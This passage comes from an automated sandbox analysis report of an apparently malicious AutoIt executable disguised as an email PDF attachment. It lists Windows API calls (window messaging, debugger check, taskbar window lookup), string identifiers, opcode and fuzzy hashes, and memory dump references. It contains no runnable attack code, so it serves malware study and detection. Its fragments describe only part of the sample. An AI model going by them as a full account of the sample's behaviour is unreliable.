  • Part of subcall function 00757DE1: _memmove.LIBCMT ref: 00757E22
  • Part of subcall function 007AAA99: GetClassNameW.USER32(?,?,000000FF), ref: 007AAABC
• SendMessageW.USER32(?,000001A2,000000FF,?), ref: 007A8E73
Strings
Similarity
• API ID: ClassMessageNameSend_memmove
• String ID: ComboBox$ListBox
• API String ID: 372448540-1403004172
• Opcode ID: 844645f8e55955a0e0643c79b50777ea67c23beabd2263bba9cf78b496fe8dfc
• Instruction ID: c123dd4bb5dcc07500b7d66df6b5c3a095d953ad0e3f4f5fff359dbc7ad208b1
• Opcode Fuzzy Hash: 844645f8e55955a0e0643c79b50777ea67c23beabd2263bba9cf78b496fe8dfc
• Instruction Fuzzy Hash: 4B0180B1A05219EB8B18ABA4CC598FE7769EB46320B144619F821572E1DE395808C651
APIs
  • Part of subcall function 00757DE1: _memmove.LIBCMT ref: 00757E22
  • Part of subcall function 007AAA99: GetClassNameW.USER32(?,?,000000FF), ref: 007AAABC
• SendMessageW.USER32(?,00000180,00000000,?), ref: 007A8D6B
Strings
Similarity
• API ID: ClassMessageNameSend_memmove
• String ID: ComboBox$ListBox
• API String ID: 372448540-1403004172
• Opcode ID: 2c573e8a3bd6f4e44cf2c39727fb5bf5723aee492f7c4e4f4dcf01aeda8f0dd6
• Instruction ID: 3aa3ed2c012ccce596ba4cd0089e87d736d92745daffc8199082b9e6f9818d58
• Opcode Fuzzy Hash: 2c573e8a3bd6f4e44cf2c39727fb5bf5723aee492f7c4e4f4dcf01aeda8f0dd6
• Instruction Fuzzy Hash: D901B1B1B41108EBCB18EBA0CD5AEFE73A8DF56300F104129B802672E1DE5D5A0CD662
APIs
  • Part of subcall function 00757DE1: _memmove.LIBCMT ref: 00757E22
  • Part of subcall function 007AAA99: GetClassNameW.USER32(?,?,000000FF), ref: 007AAABC
• SendMessageW.USER32(?,00000182,?,00000000), ref: 007A8DEE
Strings
Similarity
• API ID: ClassMessageNameSend_memmove
• String ID: ComboBox$ListBox
• API String ID: 372448540-1403004172
• Opcode ID: 67acb87ce2dfb95404cfb890e2e91b99f17fca762be0c27ec007dcf4410f76f8
• Instruction ID: 6f68a459379cf63df3449241dec5ffc42f19fe9c846e502e05a67c0d1c06dd8d
• Opcode Fuzzy Hash: 67acb87ce2dfb95404cfb890e2e91b99f17fca762be0c27ec007dcf4410f76f8
• Instruction Fuzzy Hash: 1201D4B1B41108F7CB14E6A4CD5AEFE77A8DB16300F108115BC01A72D1DA1D5E0CD272
APIs
Strings
Similarity
• API ID: ClassName_wcscmp
• String ID: #32770
• API String ID: 2292705959-463685578
• Opcode ID: 7209bb97a6a3ebe8c6808a4e4dc7c3eb8074676ca8161dbdcff690e87e10a904
• Instruction ID: e64cf6a172ec52611d91adaad455068a1022066c1171ad9605b1795dcd2ccdab
• Opcode Fuzzy Hash: 7209bb97a6a3ebe8c6808a4e4dc7c3eb8074676ca8161dbdcff690e87e10a904
• Instruction Fuzzy Hash: 97E0D8326003286BE720ABA9AC49FE7FBACEB45B70F004067FD44D3151E9749A55CBE4
APIs
  • Part of subcall function 0078B314: _memset.LIBCMT ref: 0078B321
  • Part of subcall function 00770940: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,0078B2F0,?,?,?,0075100A), ref: 00770945
• IsDebuggerPresent.KERNEL32(?,?,?,0075100A), ref: 0078B2F4
• OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,0075100A), ref: 0078B303
Strings
• ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 0078B2FE
Similarity
• API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
• String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
• API String ID: 3158253471-631824599
• Opcode ID: b521d2a6c7b536d4e8576bc8509c553c9dfa042682dff4920aec22df63c35411
• Instruction ID: 27877948112ec439d548637cb973dc522c160bc6af5be3121dd0fa16b5cc5dbc
• Opcode Fuzzy Hash: b521d2a6c7b536d4e8576bc8509c553c9dfa042682dff4920aec22df63c35411
• Instruction Fuzzy Hash: C3E03970200701CBD720AF28E8082467BE8FF40314F00896DE846C6651E7BCA409CBA1
APIs
• MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 007A7C82
  • Part of subcall function 00773358: _doexit.LIBCMT ref: 00773362
Strings
Similarity
• API ID: Message_doexit
• String ID: AutoIt$Error allocating memory.
• API String ID: 1993061046-4017498283
• Opcode ID: b5634c04ef736d113a4e98641d1b0dfdecd6d5a2f96266df752be75867ad171b
• Instruction ID: 1426a6b1683f16fca3a281b632220a5687331452750f05ec8fa3977c17e5567f
• Opcode Fuzzy Hash: b5634c04ef736d113a4e98641d1b0dfdecd6d5a2f96266df752be75867ad171b
• Instruction Fuzzy Hash: FDD02B323C535872D11432B56C0BFCA3A488F05B92F108416FF0C995D349DD85C051F8
APIs
• FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 007D596E
• PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 007D5981
  • Part of subcall function 007B5244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 007B52BC
Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: FindMessagePostSleepWindow
                                                                                                          • String ID: Shell_TrayWnd
                                                                                                          • API String ID: 529655941-2988720461
                                                                                                          • Opcode ID: 483e4a023c83e89c5c3e57c2bc0b7f811f480e7bf63e288b7c8e77aa2b566f3f
                                                                                                          • Instruction ID: f03a420b789413480af1563a8f02805c947b19c5a255bf91cf763d189226ee2c
                                                                                                          • Opcode Fuzzy Hash: 483e4a023c83e89c5c3e57c2bc0b7f811f480e7bf63e288b7c8e77aa2b566f3f
                                                                                                          • Instruction Fuzzy Hash: DFD0C935385311BAEAA4BB70AC1FFD66A24BB00B50F044826F35AAA1D0C9E89800C658
APIs
• FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 007D59AE
• PostMessageW.USER32(00000000), ref: 007D59B5
  • Part of subcall function 007B5244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 007B52BC
Strings
Memory Dump Source
• Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
• Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
Similarity
• API ID: FindMessagePostSleepWindow
• String ID: Shell_TrayWnd
• API String ID: 529655941-2988720461
• Opcode ID: 2eb27959e5a36b7244794719ead309c80473684da0ae5d5d06ee2c07815bd2ef
• Instruction ID: cfe9c70c89f15376691e2f1c6b30cbb42f170e5594317c4c1de185abe193c568
• Opcode Fuzzy Hash: 2eb27959e5a36b7244794719ead309c80473684da0ae5d5d06ee2c07815bd2ef
• Instruction Fuzzy Hash: D5D0C931382311BAEAA4BB70AC0FFD66624BB04B50F044826F356EA1D0C9E8A800C658